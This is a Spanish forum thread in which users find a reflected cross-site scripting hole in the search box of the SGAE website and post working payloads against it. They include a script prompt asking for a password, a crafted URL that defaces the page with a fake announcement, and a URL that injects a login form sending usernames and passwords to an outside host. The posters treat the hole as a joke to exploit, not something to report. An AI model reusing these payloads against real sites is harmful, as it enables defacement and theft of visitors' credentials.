fallo de seguridad?

NeB1

entrad en esta web y en el buscador poned

<script language='javascript'>alert('HELLO WORLD')</script>

es esto un fallo de seguridad?

Fyn4r

No se, pero la respuesta muy normal no es no? xD

JuAn4k4

Si, lo es.

Dod-Evers

Sí, debería de filtrar cualquier tipo de etiqueta.

erdanblo

XSS que lo llaman.

PiradoIV

Lo peor es que ni siquiera le han puesto un límite al campo de búsqueda, por lo que se pueden hacer scripts enooormes que afecten al visitante.

r2d2rigo

Los tags JSP si que los filtra... lastima :(

drount

#7 Realmente los tags JSP, como los PHP, contienen código que se ejecuta en el servidor. De este modo no se puede hacer el efecto que conseguimos con el JS (este último se ejecuta en el cliente)

Por otro lado, sería muy muy gracioso que en la portada de SGAE pusieran las "Últimas búsquedas". Así se ejecutarían los script para todo el mundo y se podrían hacer cosas divertidas, ais, qué lástima.

Dod-Evers

<script language='javascript'>prompt("Escriba su contraseña: ");</script>

Cosas así molarían... xDDD

GamA

Mirad esto:
http://www.sgae.es/search/search-es.jsp?idioma=es&select=es&texto=%3Ch1+style%3Dmargin%3A-0.1em%3B%3E%3Cfont+color%3Dorange%3ESomos+unos+ladrones%3C%2Ffont%3E%3C%2Fh1%3E+%3Chr%2F%3E%3Cdiv+style%3Dfloat%3Aleft%3E%3Cimg+src%3Dhttp%3A%2F%2Ftecnoplaneta.files.wordpress.com%2F2009%2F04%2Fcd.jpg+width%3D100px+height%3D100px%3E%3C%2Fdiv%3E%3Cdiv+style%3Dmargin-left%3A120px%3B%3E+As%ED+es%2C+desde+hoy+mismo+reconocemos+que+el+famoso+canon+es+abusivo+y+vamos+a+dejar+de+robaros.+%3C%2Fdiv%3E+%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cfont+color%3Dgray+size%3D0.5em%3ENoticia+del+28+de+Diciembre+de+2008%3C%2Ffont%3E%3C%21--

Si, me aburria :P

0buS

lol jajajaj xdd

PiradoIV

La de maldades que se pueden hacer... priceless...

http://www.sgae.es/search/search-es.jsp?idioma=es&select=es&texto=%3Cdiv+style%3D%22padding%3A+25px%3B%22%3E%3Ch1%3EIntroduce+tu+usuario+y+contrase%F1a+para+continuar%3A%3C%2Fh1%3E%3Cform+action%3D%22http%3A%2F%2Fwww.webmaster-de-sgae-arreglame-por-favor.com%2F%22%3EUsuario%3A+%3Cinput+name%3D%22usuario%22+type%3D%22text%22%3E%3Cbr%3EContrase%F1a%3A+%3Cinput+name%3D%22pass%22+type%3D%22password%22%3E%3Cbr%3E%3Cinput+type%3D%22submit%22%3E%3C%2Fform%3E%3C%2Fdiv%3E

NeB1

jajaja q bueno xDDD

Usuarios habituales

  • NeB1
  • PiradoIV
  • 0buS
  • Dod-Evers
  • r2d2rigo
  • JuAn4k4
  • Fyn4r